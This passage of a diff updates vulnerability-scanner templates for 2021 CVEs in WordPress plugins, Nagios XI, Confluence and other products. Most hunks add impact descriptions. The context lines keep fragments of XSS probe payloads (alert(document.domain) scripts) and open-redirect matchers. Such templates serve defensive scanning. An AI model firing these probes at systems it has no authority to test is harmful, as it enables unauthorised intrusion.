+# digest: 490a00463044022032fd66b145f4ee65e0d5d967e21aab82bfafa33355a2be38e31c65a98b4cb57f0220379fe6c5d87169dbe2534a2c73a2474bb5762d7d9b09ce37df15273a6bdb9e99:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-25067.yaml b/http/cves/2021/CVE-2021-25067.yaml
index c192739aa8..19e1293e65 100644
--- a/http/cves/2021/CVE-2021-25067.yaml
+++ b/http/cves/2021/CVE-2021-25067.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     The Landing Page Builder WordPress plugin before 1.4.9.6 was affected by a reflected XSS in page-builder-add on the ulpb_post admin page.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the affected website, leading to potential data theft, session hijacking, or defacement.
   remediation: Fixed in version 1.4.9.6.
   reference:
     - https://wpscan.com/vulnerability/365007f0-61ac-4e81-8a3a-3a068f2c84bc
@@ -47,4 +49,4 @@ http:
           - 'contains(body_2, "test\\\" style=animation-name:rotation onanimationstart=alert(document.domain)")'
           - 'contains(body_2, "Enter Page Title")'
         condition: and
-# digest: 4b0a00483046022100de824ecca6c44b08ddb59dd54387fe39d23d607397fe7c2afaed6f93c2218d7f022100fd3b2a28fdea3ccb28142b06ffa1d5e57968e7cf991a88a1e188d193e375cf53:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a0048304602210095416262ea35a1a07e878d6558f61aecd8ca3254ef7c43232fa2d5d88e0d6ebd022100eaf90ec452f6d3e6d004b082d1a4d6ea22178e4293fc8238443dc6dff27c22a3:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-25074.yaml b/http/cves/2021/CVE-2021-25074.yaml
index bbe0f8efce..0e466e3ab9 100644
--- a/http/cves/2021/CVE-2021-25074.yaml
+++ b/http/cves/2021/CVE-2021-25074.yaml
@@ -5,6 +5,8 @@ info:
   author: dhiyaneshDk
   severity: medium
   description: WordPress WebP Converter for Media < 4.0.3 contains a file (passthru.php) which does not validate the src parameter before redirecting the user to it, leading to an open redirect issue.
+  impact: |
+    An attacker can trick users into visiting a malicious website, leading to potential phishing attacks or the disclosure of sensitive information.
   remediation: |
     Update to the latest version of the WordPress WebP Converter for Media plugin (4.0.3) or remove the plugin if not needed.
   reference:
@@ -35,4 +37,4 @@ http:
         part: header
         regex:
           - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1
-# digest: 4a0a004730450221008521aa7c52aadea8dc47a628f9648942ccc3c97db14fd2c9ea80411ee5091eba02201557f2b36bbe1791f726f7fa8dc5111607784d2d0945ddd722f7a02f2e01c44c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402204b6bc2c5f6ecbee4fac6da9f72fe4149748f88b492a3f6c3ff27e5beeb5f02d4022053a44afd6f77a0575bc564d6511cb3af9f823a7f7358ee6ff91a919af5e84fd7:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-25075.yaml b/http/cves/2021/CVE-2021-25075.yaml
index 45d714ec0c..b50fb608af 100644
--- a/http/cves/2021/CVE-2021-25075.yaml
+++ b/http/cves/2021/CVE-2021-25075.yaml
@@ -6,6 +6,8 @@ info:
   severity: low
   description: |
     WordPress Duplicate Page or Post plugin before 1.5.1 contains a stored cross-site scripting vulnerability. The plugin does not have any authorization and has a flawed cross-site request forgery check in the wpdevart_duplicate_post_parametrs_save_in_db AJAX action, allowing unauthenticated users to call it and change the plugin's settings, or perform such attack via cross-site request forgery.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.
   remediation: Fixed in version 1.5.1.
   reference:
     - https://wpscan.com/vulnerability/db5a0431-af4d-45b7-be4e-36b6c90a601b
@@ -64,4 +66,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a0047304502205d141f939d017cd60364f631861cb1c33d35e3b8615fc56a606b3d0b0a8ad87c022100983163bde879b1cb5bba1add4c20e46e2710c8c0cd85071774c4d26840899ccc:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100b07e74bbbb2b749280ea663d7176b37404f4e6322e0cbbe8b60c36e51e2c9e7002201fff4b1a758454395899eda88bbb8dd520b7efcf15a258fd7f4d64c6b8652138:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-25078.yaml b/http/cves/2021/CVE-2021-25078.yaml
index 7711279b9b..d53c182a5f 100644
--- a/http/cves/2021/CVE-2021-25078.yaml
+++ b/http/cves/2021/CVE-2021-25078.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     The plugin does not validate, sanitise and escape the IP address of requests logged by the click tracking feature, allowing unauthenticated attackers to perform Cross-Site Scripting attacks against admin viewing the tracked requests.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of an authenticated user, potentially leading to session hijacking, defacement, or theft of sensitive information.
   remediation: Fixed in version 2.9.0
   reference:
     - https://wpscan.com/vulnerability/d4edb5f2-aa1b-4e2d-abb4-76c46def6c6e
@@ -51,4 +53,4 @@ http:
           - 'contains(body_3, "<img src onerror=alert(document.domain)>")'
           - 'contains(body_3, "Affiliates Manager Click Tracking")'
         condition: and
-# digest: 490a004630440220710d5a7f43301ecc07d2eaee59da95c07d7649f2b422a8b9baee87c909691e910220792915c41457a9936920a7bab72ab13b325417f6d3bbf1437e04ef07cd5affa6:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a0048304602210097c550f58f7b5858435e2d196f6741fb992e106cccf9c7e0e4ffba761a008ab8022100cb02027889ae9d8cf0910bec1c4449a55666b2d2e2df7064fce9f561055ab74c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-25085.yaml b/http/cves/2021/CVE-2021-25085.yaml
index d0e003e8f1..4fce062510 100644
--- a/http/cves/2021/CVE-2021-25085.yaml
+++ b/http/cves/2021/CVE-2021-25085.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     The WOOF WordPress plugin does not sanitize or escape the woof_redraw_elements parameter before reflecting it back in an admin page, leading to a reflected cross-site scripting.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.
   remediation: |
     Update to the latest version of the WOOF WordPress plugin, which includes proper input sanitization to mitigate the XSS vulnerability.
   reference:
@@ -48,4 +50,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022070ea4bbba4aaf38f7ae976e5d4ea5758563e235b12ba8106555d133ff11ad27f022100824bf72b9bde35753d3d513105d91fb4deee3c389e585f9a450af8e8dab2d4bc:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502210092fb8cf56ead10be69159a982c7e2ffc7a513ecd3fbb66b198b52f20e8a3be6902206e866e1f8f9093a148d74d29473b17b3d4479302673987486361c8ebb1e34ee5:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-25099.yaml b/http/cves/2021/CVE-2021-25099.yaml
index cf11fc0ea3..f071bcdf28 100644
--- a/http/cves/2021/CVE-2021-25099.yaml
+++ b/http/cves/2021/CVE-2021-25099.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     WordPress GiveWP plugin before 2.17.3 contains a cross-site scripting vulnerability. The plugin does not sanitize and escape the form_id parameter before returning it in the response of an unauthenticated request via the give_checkout_login AJAX action. An attacker can inject arbitrary script in the browser of a user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.
   remediation: |
     Update to the latest version of the GiveWP plugin (2.17.3 or higher) to mitigate this vulnerability.
   reference:
@@ -46,4 +48,4 @@ http:
           - 'contains(body, "<script>alert(document.domain)</script>")'
           - 'contains(body, "give_user_login")'
         condition: and
-# digest: 4b0a004830460221009c0c05c8a422af539429963ac6fbf64bc22828a20ba2eedcc2c5639d8c2d10f202210093bb83f3f7356fe4dc7642cf73b0483c17413ead505de95ce14368aa8d52f02f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502202b189be7e937901d941220faa1b4f83c5c44224e83965a07c24b86dea6a94cac022100b94af79e45ef584c56fa986052d59a3e04814c2139014b1d52825f44dfe3fe1d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-25104.yaml b/http/cves/2021/CVE-2021-25104.yaml
index c2223c9585..a3985b2082 100644
--- a/http/cves/2021/CVE-2021-25104.yaml
+++ b/http/cves/2021/CVE-2021-25104.yaml
@@ -5,6 +5,8 @@ info:
   author: Akincibor
   severity: medium
   description: WordPress Ocean Extra plugin before 1.9.5 contains a cross-site scripting vulnerability. The plugin does not escape generated links which are then used when the OceanWP theme is active.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.
   remediation: Fixed in version 1.9.5.
   reference:
     - https://wpscan.com/vulnerability/2ee6f1d8-3803-42f6-9193-3dd8f416b558
@@ -57,4 +59,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100a2f74677f8a5b4959d83ae321bb525ffdd0573359e922290ffe89a7b869b19ac022071fafcce593bda470ae3a18698b3e4d209645c80038da6a48f38a6631d147a87:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a004730450220133ff8dc7fdb479821b54173bf982cdf25e9d4127b1542723f885f2c922e0f19022100cd3d52df521dd27776ec2a74f649c0dd93364ec6dd05a3060dce4ffde22dead4:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-25111.yaml b/http/cves/2021/CVE-2021-25111.yaml
index 99fbd809ab..c49f1fc24c 100644
--- a/http/cves/2021/CVE-2021-25111.yaml
+++ b/http/cves/2021/CVE-2021-25111.yaml
@@ -5,6 +5,8 @@ info:
   author: akincibor
   severity: medium
   description: WordPress English Admin plugin before 1.5.2 contains an open redirect vulnerability. The plugin does not validate the admin_custom_language_return_url before redirecting users to it. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
+  impact: |
+    An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the execution of other malicious activities.
   remediation: |
     Update to the latest version of the WordPress English Admin plugin (1.5.2 or higher) to fix the open redirect vulnerability.
   reference:
@@ -35,4 +37,4 @@ http:
         part: header
         regex:
           - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1
-# digest: 4a0a00473045022100e07816b563368a1dace34164e604e5055c559edaa69ecd2ec40abf889653cd5a02203cf30d6544a3bcb7d9b3bfe4a7c75a05c3ee56fed844f3f80f53eb7e833efcf1:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022050579344f17d23d7711e9bf5b102599b253617a622bcf24dc49c72674d41541f022100de88d76e8e791fd4bcd4542cd9a7fe956067d6bdb764bbe101348cbaee98699c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-25112.yaml b/http/cves/2021/CVE-2021-25112.yaml
index e5fb64dd3d..7e767f2fee 100644
--- a/http/cves/2021/CVE-2021-25112.yaml
+++ b/http/cves/2021/CVE-2021-25112.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     WordPress WHMCS Bridge plugin before 6.4b contains a reflected cross-site scripting vulnerability. It does not sanitize and escape the error parameter before outputting it back in the admin dashboard.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected website.
   remediation: |
     Update WordPress WHMCS Bridge to version 6.4b or later to mitigate this vulnerability.
   reference:
@@ -56,4 +58,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100b3d0c62ecce361a9e6e612a43ad36690cefc98a796e3446e465fd92928f4f06e022100bccee11f1d3332c75797854da3a3e86f914b85744c1410773d2fc3717a58a3f5:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100845e9d43de2b4d7307aa656d1eb8d00eee7f5e63d4f0b0e790be368fad0bac70022100edc09b267f1875bf5dd07f1ce59e962c1e11e933e352afbaa002218ea4804063:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-25114.yaml b/http/cves/2021/CVE-2021-25114.yaml
index fc19e1621a..b6d64bd09f 100644
--- a/http/cves/2021/CVE-2021-25114.yaml
+++ b/http/cves/2021/CVE-2021-25114.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     WordPress Paid Memberships Pro plugin before 2.6.7 is susceptible to blind SQL injection. The plugin does not escape the discount_code in one of its REST routes before using it in a SQL statement. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to extract sensitive information from the database.
   remediation: |
     Upgrade to WordPress Paid Memberships Pro version 2.6.7 or later to mitigate this vulnerability.
   reference:
@@ -48,4 +50,4 @@ http:
           - status_code == 200
           - contains(body_2, 'other_discount_code_')
         condition: and
-# digest: 4a0a004730450221008f27d61a3ae08cbbc2cd1b18da2689a04bf6b79313dfbe0d5f83d49edc18ae900220110519d9bbccf130270a3a2520e922efeab11d8817126ad0b19d3d8d997d6e44:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a00463044022003c81018d07bcf4be544ae2b3de80cb5434b843ef2b39f212cd4e34146f01b8902201de74d8c12aa9ecdd68233fae0fec0885d0eaabc5356dfa162f42db6f6e84c09:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-25118.yaml b/http/cves/2021/CVE-2021-25118.yaml
index eb96b6b736..6a33cecbfe 100644
--- a/http/cves/2021/CVE-2021-25118.yaml
+++ b/http/cves/2021/CVE-2021-25118.yaml
@@ -5,6 +5,8 @@ info:
   author: DhiyaneshDK
   severity: medium
   description: Yoast SEO plugin 16.7 to 17.2 is susceptible to information disclosure, The plugin discloses the full internal path of featured images in posts via the wp/v2/posts REST endpoints, which can help an attacker identify other vulnerabilities or help during the exploitation of other identified vulnerabilities.
+  impact: |
+    An attacker can exploit this vulnerability to gain sensitive information from the target system.
   remediation: Fixed in version 17.3.
   reference:
     - https://wpscan.com/vulnerability/2c3f9038-632d-40ef-a099-6ea202efb550
@@ -51,4 +53,4 @@ http:
         regex:
           - '"path":"(.*)/wp-content\\(.*)","size'
         part: body
-# digest: 4a0a00473045022100b34b7967d78365c187fca2fa3d2fc00be154f27b6957307de2287251df2f292b02205aa82d7c5171c429c9ceee51f8adfd9141dbe5474ddbba770c71655b7aae9c9d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a00463044022070dd9e053235f9ce7eee58749697c6911d75297250c56245094a9809a2a06523022027c737047f6a33fecc65adb5437913980051804c08428cb8da01226af085ed67:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-25296.yaml b/http/cves/2021/CVE-2021-25296.yaml
index 321b98fbc8..516f9f8f88 100644
--- a/http/cves/2021/CVE-2021-25296.yaml
+++ b/http/cves/2021/CVE-2021-25296.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     Nagios XI 5.5.6 through 5.7.5 is susceptible to authenticated remote command injection. There is improper sanitization of authenticated user-controlled input by a single HTTP request via the file /usr/local/nagiosxi/html/includes/configwizards/windowswmi/windowswmi.inc.php. This in turn can lead to remote code execution, by which an attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.
+  impact: |
+    Successful exploitation of this vulnerability allows authenticated attackers to execute arbitrary commands on the target system.
   remediation: |
     Upgrade Nagios XI to a patched version or apply the vendor-supplied patch to mitigate this vulnerability.
   reference:
@@ -83,4 +85,4 @@ http:
           - "var nsp_str = ['\"](.*)['\"];"
         internal: true
         part: body
-# digest: 4b0a00483046022100f1a22a6f91fce394b8cdefe3078451c5405ddcd1a2bb3b1ad6ebc548d4b0bc7b022100c403d961d6e3c38d4adb005d764f1ee07914e8c044c78b21ee9ac78daa8f8d29:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402205dae8256764657fe8c88f47266d716c00efd724870f1ab4e936978bacc7b6f00022031cbd995d389568cf93cf9c1e469a452ac7c08244cace4bf52fe3937bf719cdc:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-25297.yaml b/http/cves/2021/CVE-2021-25297.yaml
index a0d1b19f41..593bdd9622 100644
--- a/http/cves/2021/CVE-2021-25297.yaml
+++ b/http/cves/2021/CVE-2021-25297.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     Nagios XI 5.5.6 through 5.7.5 is susceptible to authenticated remote command injection. There is improper sanitization of authenticated user-controlled input by a single HTTP request via the file /usr/local/nagiosxi/html/includes/configwizards/switch/switch.inc.php. This in turn can lead to remote code execution, by which an attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.
+  impact: |
+    Successful exploitation of this vulnerability allows an authenticated attacker to execute arbitrary commands on the target system.
   remediation: |
     Upgrade Nagios to a version higher than 5.7.5 or apply the provided patch to mitigate the vulnerability.
   reference:
@@ -83,4 +85,4 @@ http:
           - "var nsp_str = ['\"](.*)['\"];"
         internal: true
         part: body
-# digest: 490a0046304402200f2d9d655925f930ff9b6e119725083944e6f3c8f2dd3f5bf8d3c8ae4e77f12302207bfb9255561269a10ea172d59530b3961079f2534273613208ae49c35f4398af:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100f2709a2d75ebb716cb3c797e7a0f6753ec7e0dfca62fd3395564e2385cbd290e022070c82b3f9f38bdce82c69e12b56f160491f3b10ddfe29761ff8ae14cf640d4e6:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-25298.yaml b/http/cves/2021/CVE-2021-25298.yaml
index 2221db63fc..8596db30f3 100644
--- a/http/cves/2021/CVE-2021-25298.yaml
+++ b/http/cves/2021/CVE-2021-25298.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     Nagios XI 5.5.6 through 5.7.5 is susceptible to authenticated remote command injection. There is improper sanitization of authenticated user-controlled input by a single HTTP request via the file /usr/local/nagiosxi/html/includes/configwizards/cloud-vm/cloud-vm.inc.php. This in turn can lead to remote code execution, by which an attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.
+  impact: |
+    Successful exploitation of this vulnerability allows an authenticated attacker to execute arbitrary commands on the target system.
   remediation: |
     Upgrade Nagios XI to a patched version or apply the vendor-supplied patch to mitigate this vulnerability.
   reference:
@@ -83,4 +85,4 @@ http:
           - "var nsp_str = ['\"](.*)['\"];"
         internal: true
         part: body
-# digest: 4a0a00473045022100abcf732f673bd42657c69db5e8c7644b6c4ee4952470a03afd0a6a177c976d7f022052508eb2a6014920411031830408a2cd11507c88a6139dc94e1e05759a770a8f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502204c2f168d55a765cc02d3c9aacd5e03d05998b987681815486a466b25d989a7a3022100cb3b894355bc574bd6dfef9109cfd2ac8b6d40c9c65c6890966ca474d20854b5:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-25646.yaml b/http/cves/2021/CVE-2021-25646.yaml
index b3f2682d25..7efb979fd6 100644
--- a/http/cves/2021/CVE-2021-25646.yaml
+++ b/http/cves/2021/CVE-2021-25646.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     Apache Druid is susceptible to remote code execution because by default it lacks authorization and authentication. Attackers can send specially crafted requests to execute arbitrary code with the privileges of processes on the Druid server.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
   remediation: |
     Apply the latest security patches or upgrade to a patched version of Apache Druid.
   reference:
@@ -92,4 +94,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a004630440220664a28eb278d0802ffafa99119f33f612bf2b75fba90eb496edd24ad6a7d748302200b965213ed993e6bbf9b38df5534abadb68eb00d76c81d70a843a7fe4e08d949:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a0048304602210093b2f214f71ed9cc643649807b6e0d36b51b68077551699a6eee5355ac475967022100e624668540bff407a51ef4f7c680a796aa25af92fed07a96a381cfc87246d33a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-25864.yaml b/http/cves/2021/CVE-2021-25864.yaml
index 964a460b63..f6cbdaedea 100644
--- a/http/cves/2021/CVE-2021-25864.yaml
+++ b/http/cves/2021/CVE-2021-25864.yaml
@@ -5,6 +5,8 @@ info:
   author: 0x_Akoko
   severity: high
   description: Hue Magic 3.0.0 is susceptible to local file inclusion via the res.sendFile API.
+  impact: |
+    The LFI vulnerability can lead to unauthorized access to sensitive files, potentially exposing sensitive information or allowing for further exploitation.
   remediation: |
     Apply the latest security patch or update to a non-vulnerable version of Hue Magic.
   reference:
@@ -40,4 +42,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100ce538a19f29507f6aac8f7604aa3716b0889d88677cfc2c5550e2d36398e686d022100cb8f2632176d426c65e15c43fdddc873d038b6a2324112a1be7b0f15403a01b0:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022018aca7fea036bc77f3255980698c7984540feb6c054817639c6fc9b0e86093c8022100c8445911676c81b33dc5b353e89767bb56d63b88843f2d15fdc2b2c8fc817a30:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-25899.yaml b/http/cves/2021/CVE-2021-25899.yaml
index a10602902d..8621f055ef 100644
--- a/http/cves/2021/CVE-2021-25899.yaml
+++ b/http/cves/2021/CVE-2021-25899.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     Void Aural Rec Monitor 9.0.0.1 contains a SQL injection vulnerability in svc-login.php. An attacker can send a crafted HTTP request to perform a blind time-based SQL injection via the param1 parameter and thus possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.
   remediation: |
     Apply the latest patch or update provided by the vendor to fix the SQL Injection vulnerability in Void Aural Rec Monitor 9.0.0.1.
   reference:
@@ -44,4 +46,4 @@ http:
           - 'contains(content_type, "text/html")'
           - 'contains(body, "Contacte con el administrador")'
         condition: and
-# digest: 4a0a004730450220211de6712e86ff0a4e003305b7d580abc616d425acf728954a834a482633f121022100a7606457c34026025283707239294b11827bef7bbe6ea321c96442d3cebcf6a3:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100ccfeb1ff342bdad5db6a0d41ba0037da90cd5c3fb23b1ad0d9ba3dbb633b685c022100f36af797d6fdb1c565ffc1a02010aaa0d2fccb15adf18a1494fc5480b492078b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-26084.yaml b/http/cves/2021/CVE-2021-26084.yaml
index 3210c580bf..f243a01b34 100644
--- a/http/cves/2021/CVE-2021-26084.yaml
+++ b/http/cves/2021/CVE-2021-26084.yaml
@@ -5,6 +5,8 @@ info:
   author: dhiyaneshDk,philippedelteil
   severity: critical
   description: Confluence Server and Data Center contain an OGNL injection vulnerability that could allow an authenticated user, and in some instances an unauthenticated user, to execute arbitrary code on a Confluence Server or Data Center instance. The affected versions are before version 6.13.23, from version 6.14.0 before 7.4.11, from version 7.5.0 before 7.11.6, and from  version 7.12.0 before 7.12.5. The vulnerable endpoints can be accessed by a non-administrator user or unauthenticated user if 'Allow people to sign up to create their account' is enabled. To check whether this is enabled go to COG > User Management > User Signup Options.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected server.
   remediation: |
     Apply the latest security patches provided by Atlassian to mitigate this vulnerability.
   reference:
@@ -64,4 +66,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a00463044022043a57324e02f63a50b5e70e6d65f3e04e08a50f44e0d3ece1fa5211a1f4949f60220287099a0c57b4f81f194b3e614df3ecec0c19287c0d6c20317e81dcc7c659625:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502202a862ccaec1bf0882ebd81abb6c9978d828f3324cf76f51ce9ed701e296d60b2022100c86c51ee8bed26e330ee8133993153b848360c9ea29e149836496423de38b0a9:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-26085.yaml b/http/cves/2021/CVE-2021-26085.yaml
index 72e7a1512f..cfd93f3dd6 100644
--- a/http/cves/2021/CVE-2021-26085.yaml
+++ b/http/cves/2021/CVE-2021-26085.yaml
@@ -5,6 +5,8 @@ info:
   author: princechaddha
   severity: medium
   description: Atlassian Confluence Server allows remote attackers to view restricted resources via local file inclusion in the /s/ endpoint.
+  impact: |
+    An attacker can access sensitive information stored on the server, potentially leading to unauthorized access or data leakage.
   remediation: |
     Apply the latest security patches provided by Atlassian to fix the vulnerability.
   reference:
@@ -44,4 +46,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a0048304602210096a9a02297c8ed0a8994e72e4d49e40cdfe787cbb83027c5eda54625c6d54515022100b3ab772740685bedb95bfb7fb1e6d893d0fe34ead4dd653920f4ccfd2932d931:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a004830460221009f48a5d30767ae69b37f1824914151637f3bcaee048cbb479289df731c23a679022100d45f7db52d4b6814cfbb7d54686466142ea79ea0cf4463db775f726c1185495c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-26086.yaml b/http/cves/2021/CVE-2021-26086.yaml
index e5557c8fd7..705903edb3 100644
--- a/http/cves/2021/CVE-2021-26086.yaml
+++ b/http/cves/2021/CVE-2021-26086.yaml
@@ -5,6 +5,8 @@ info:
   author: cocxanh
   severity: medium
   description: Affected versions of Atlassian Jira Limited Server and Data Center are vulnerable to local file inclusion because they allow remote attackers to read particular files via a path traversal vulnerability in the /WEB-INF/web.xml endpoint.
+  impact: |
+    This vulnerability can result in unauthorized access to sensitive files and data, as well as potential remote code execution, leading to a complete compromise of the affected system.
   remediation: |
     Apply the latest security patches and updates provided by Atlassian to mitigate this vulnerability.
   reference:
@@ -43,4 +45,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100dfd0ef392807241c6aee7a92bae7a4e2741971a22c4cd04b56f8f681c2476574022036dfef7d2c92cc73822d3066dfa9ed35f8779c2637306863cb18f34fba743985:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100db68e3588ba2c3ff01b6d0cadf5d2ff29e142b5906357cba51d1375ebb4d9662022100b4ed436e00796685aad003dad8b688ada7d6a5c054d06cb3bdf6c047fa08a802:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-26247.yaml b/http/cves/2021/CVE-2021-26247.yaml
index d42f2e2615..e6562d0bd9 100644
--- a/http/cves/2021/CVE-2021-26247.yaml
+++ b/http/cves/2021/CVE-2021-26247.yaml
@@ -5,6 +5,8 @@ info:
   author: dhiyaneshDK
   severity: medium
   description: Cacti contains a cross-site scripting vulnerability via "http://<CACTI_SERVER>/auth_changepassword.php?ref=<script>alert(1)</script>" which can successfully execute the JavaScript payload present in the "ref" URL parameter.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Apply the latest security patches or upgrade to a patched version of Cacti to mitigate this vulnerability.
   reference:
@@ -44,4 +46,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a004730450220540771e1dbee2185396b03250be4cab979b4a76dc430b67abccebde8758d96630221008bc7d404e43e5cc14b4955f66f09e74f97de27af4c7931b134500a6a92d26cf0:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502206cdc32d9c4c4bb57c3a2f3614d7211bf26d98defd031efa8c46355976a4a893e022100ecc166c0404f141209ca3ab1499a38cc5034af751c5fad31769f2ef2f4212773:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-26295.yaml b/http/cves/2021/CVE-2021-26295.yaml
index bb05bd13ce..06942a1a19 100644
--- a/http/cves/2021/CVE-2021-26295.yaml
+++ b/http/cves/2021/CVE-2021-26295.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     Apache OFBiz has unsafe deserialization prior to 17.12.06. An unauthenticated attacker can use this vulnerability to successfully take over Apache OFBiz.
+  impact: |
